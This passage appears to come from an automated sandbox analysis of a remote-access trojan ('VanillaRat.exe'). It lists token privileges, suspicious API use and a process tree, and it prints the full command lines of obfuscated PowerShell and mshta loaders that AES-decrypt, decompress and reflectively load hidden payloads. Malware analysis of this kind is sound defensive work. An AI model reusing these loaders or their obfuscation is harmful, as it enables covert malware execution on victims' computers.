| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e8ef9856-2242-4506-a2b7-6fc77981a37b}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{c0b360b8-a2cb-4a57-a190-137e05dafe32}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3ec00975-2522-4e40-adf0-4435a70b2e38}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{022663ae-862b-4f38-a00d-dbb525a00dd4}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{d504caaa-c79c-453c-b1bc-18ebb1c7ea53}
C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1452).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 